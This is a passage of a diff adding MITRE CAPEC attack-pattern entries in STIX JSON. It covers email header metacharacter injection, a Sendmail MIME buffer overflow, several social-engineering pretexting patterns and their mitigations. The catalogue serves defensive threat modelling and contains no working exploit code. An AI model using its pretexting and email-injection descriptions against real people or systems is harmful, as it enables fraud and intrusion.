"attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-408", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/408.html" + } + ], + "id": "attack-pattern--4b3c7a8c-f801-43d9-9ba7-1d0e2dc87e8b", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Information Gathering from Traditional Sources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-409", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/409.html" + } + ], + "id": "attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Information Gathering from Non-Traditional Sources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack involves an attacker leveraging meta-characters in email headers to inject improper behavior into email programs. Email software has become increasingly sophisticated and feature-rich. In addition, email applications are ubiquitous and connected directly to the Web making them ideal targets to launch and propagate attacks. As the user demand for new functionality in email applications grows, they become more like browsers with complex rendering and plug in routines. As more email functionality is included and abstracted from the user, this creates opportunities for attackers. Virtually all email applications do not list email header information by default, however the email header contains valuable attacker vectors for the attacker to exploit particularly if the behavior of the email client application is known. Meta-characters are hidden from the user, but can contain scripts, enumerations, probes, and other attacks against the user's system.", + "external_references": [ + { + "external_id": "CAPEC-41", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/41.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "external_id": "CWE-88", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Meta-characters in E-mail Headers to Inject Malicious Payloads", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "attack-pattern--3e3f4570-827b-4e0e-859b-00a4b13a1a65" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n To:From:Headerdef: whatever\n ", + "\n Meta-characters are among the most valuable tools attackers have to deceive users into taking some action on their behalf. E-mail is perhaps the most efficient and cost effective attack distribution tool available, this has led to the phishing pandemic.\n Meta-characters like \\w \\s \\d ^ can allow the attacker to escape out of the expected behavior to execute additional commands. Escaping out the process (such as email client) lets the attacker run arbitrary code in the user's process.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. Identify and characterize metacharacter-processing vulnerabilities in email headers: An attacker creates emails with headers containing various metacharacter-based malicious payloads in order to determine whether the target application processes the malicious content and in what manner it does so.

    2. Techniques
    Use an automated tool (fuzzer) to create malicious emails headers containing metacharacter-based payloads.
    Manually tampering email headers to inject malicious metacharacter-based payload content in them.

Exploit

  1. An attacker leverages vulnerabilities identified during the Experiment Phase to inject malicious email headers and cause the targeted email application to exhibit behavior outside of its expected constraints.

    2. Techniques
    Send emails with specifically-constructed, metacharacter-based malicious payloads in the email headers to targeted systems running email processing applications identified as vulnerable during the Experiment Phase.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "This attack targets most widely deployed feature rich email applications, including web based email programs." + ], + "x_capec_skills_required": { + "Low": "To distribute email" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Perform validation on email header data", + "id": "course-of-action--361f2be0-52ef-4735-8cc4-8a426c93ca0b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-41-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc743c69-d4ac-4767-91af-c4ef9e82f50a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--361f2be0-52ef-4735-8cc4-8a426c93ca0b", + "spec_version": "2.1", + "target_ref": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement email filtering solutions on mail server or on MTA, relay server.", + "id": "course-of-action--b3921afe-87f5-45f4-9cd6-6f64aa39debb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-41-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--78fc3fe0-3e55-40a5-af05-614cea38688b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3921afe-87f5-45f4-9cd6-6f64aa39debb", + "spec_version": "2.1", + "target_ref": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Mail servers that perform strict validation may catch these attacks, because metacharacters are not allowed in many header variables such as dns names", + "id": "course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-41-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5cba6ee4-dbac-4c77-8236-a6fcf7036196", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba", + "spec_version": "2.1", + "target_ref": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages an individual using any combination of social engineering methods for the purpose of extracting information. Accurate contextual and environmental queues, such as knowing important information about the target company or individual can greatly increase the success of the attack and the quality of information gathered. Authentic mimicry combined with detailed knowledge increases the success of elicitation attacks.", + "external_references": [ + { + "external_id": "CAPEC-410", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/410.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--5c60a410-64a7-46e2-9d46-82a232a6ce3e", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Information Elicitation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-407 : Social Information Gathering via Pretexting\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-411", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/411.html" + } + ], + "id": "attack-pattern--03093798-f245-4ed2-a085-88e69d303b11", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Pretexting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior, assuming the role of someone who works for Customer Service, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. One example of a scenario such as this would be to call an individual, articulate your false affiliation with a credit card company, and then attempt to get the individual to verify their credit card number.", + "external_references": [ + { + "external_id": "CAPEC-412", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/412.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--2d533987-71b1-41a3-873b-38d63188d2eb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Customer Service", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_domains": [ + "Social Engineering", + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior, assuming the role of a tech support worker, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. An adversary who uses social engineering to impersonate a tech support worker can have devastating effects on a network. This is an effective attack vector, because it can give an adversary physical access to network computers. It only takes a matter of seconds for someone to compromise a computer with physical access. One of the best technological tools at the disposal of a social engineer, posing as a technical support person, is a USB thumb drive. These are small, easy to conceal, and can be loaded with different payloads depending on what task needs to be done. However, this form of attack does not require physical access as it can also be effectively carried out via phone or email.", + "external_references": [ + { + "external_id": "CAPEC-413", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/413.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--5e0c909b-70a3-4275-a696-91801247ed68", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Tech Support", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_domains": [ + "Social Engineering", + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior, assuming the role of a delivery person, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. Impersonating a delivery person is an effective attack and an easy attack since not much acting is involved. Usually the hardest part is looking the part and having all of the proper credentials, papers and \"deliveries\" in order to be able to pull it off.", + "external_references": [ + { + "external_id": "CAPEC-414", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/414.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--7ed74d19-ed2b-40c4-a63c-54367b2653c4", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Delivery Person", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_domains": [ + "Social Engineering", + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior, assuming some sort of trusted role, and contacting the targeted individual or organization via phone to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. This is the most common social engineering attack. Some of the most commonly effective approaches are to impersonate a fellow employee, impersonate a computer technician or to target help desk personnel.", + "external_references": [ + { + "external_id": "CAPEC-415", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/415.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--490fc09c-a624-44cd-8e9e-f4ce8ad2311e", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Phone", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_domains": [ + "Social Engineering", + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits inherent human psychological predisposition to influence a targeted individual or group to solicit information or manipulate the target into performing an action that serves the adversary's interests. Many interpersonal social engineering techniques do not involve outright deception, although they can; many are subtle ways of manipulating a target to remove barriers, make the target feel comfortable, and produce an exchange in which the target is either more likely to share information directly, or let key information slip out unintentionally. A skilled adversary uses these techniques when appropriate to produce the desired outcome. Manipulation techniques vary from the overt, such as pretending to be a supervisor to a help desk, to the subtle, such as making the target feel comfortable with the adversary's speech and thought patterns.", + "external_references": [ + { + "external_id": "CAPEC-416", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/416.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Manipulate Human Behavior", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30", + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5", + "attack-pattern--89d61215-2dcb-4684-983b-89a6e519b035", + "attack-pattern--346d34f3-13e5-4d95-8e96-4b381e76e132", + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--756dbec1-5182-44f6-a59e-093c4b3f451e", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2e37142-f4ef-407a-a43e-f0e3ecad8596", + "spec_version": "2.1", + "target_ref": "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary uses social engineering to exploit the target's perception of the relationship between the adversary and themselves. This goal is to persuade the target to unknowingly perform an action or divulge information that is advantageous to the adversary.", + "external_references": [ + { + "external_id": "CAPEC-417", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/417.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + }, + { + "description": "Social Engineering: The Art of Human Hacking, 2010, Wiley", + "external_id": "REF-360", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "attack-pattern--490d66db-ab96-48b4-ad40-8625319530eb", + "attack-pattern--effcb600-1cb5-4601-baa6-cb8fc02d586c", + "attack-pattern--ef383edc-9f3a-405f-9406-3bd186551d35", + "attack-pattern--57a56016-e387-456e-badf-a60523e58277", + "attack-pattern--d8a0c0f1-dc07-49d4-9d4a-e96e526a4c69" + ], + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "There are no necessary resources required for this attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.", + "id": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-417-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f1bc7a7-fc63-4847-b2bf-ad73c7d19b20", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a social engineering techniques to produce a sense of obligation in the target to perform a certain action or concede some sensitive or key piece of information. Obligation has to do with actions one feels they need to take due to some sort of social, legal, or moral requirement, duty, contract, or promise. There are various techniques for fostering a sense of obligation to reciprocate or concede during ordinary modes of communication. One method is to compliment the target, and follow up the compliment with a question. If performed correctly the target may volunteer a key piece of information, sometimes involuntarily.", + "external_references": [ + { + "external_id": "CAPEC-418", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/418.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + }, + { + "description": "Social Engineering: The Art of Human Hacking, 2010, Wiley", + "external_id": "REF-360", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Reciprocation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "An adversary develops a relationship with the target to foster a feeling of obligation in them to perform a certain action or concede some information. A perception of obligation/concession means that the target feels they need to behave in some way or perform some sort of action due to being morally or legally bound to do so." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04915a3b-b205-4fc6-8701-3035bdceff35", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate pattern.", + "external_references": [ + { + "external_id": "CAPEC-419", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/419.html" + } + ], + "id": "attack-pattern--c5724646-0a5b-4b60-b0e2-6c445a744628", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Perception of Concession", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back.", + "external_references": [ + { + "external_id": "CAPEC-42", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/42.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "CERT Advisory CA-1997-05 MIME Conversion Buffer Overflow in Sendmail Versions 8.8.3 and 8.8.4, Software Engineering Institute: Carnegie Mellon University", + "external_id": "REF-364", + "source_name": "reference_from_CAPEC", + "url": "http://www.cert.org/advisories/CA-1997-05.html" + } + ], + "id": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "MIME Conversion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A MIME conversion buffer overflow exists in Sendmail versions 8.8.3 and 8.8.4. Sendmail versions 8.8.3 and 8.8.4 are vulnerable to a buffer overflow in the MIME handling code. By sending a message with specially-crafted headers to the server, a remote attacker can overflow a buffer and execute arbitrary commands on the system with root privileges.\n Sendmail performs a 7 bit to 8 bit conversion on email messages. This vulnerability is due to the fact that insufficient bounds checking was performed while 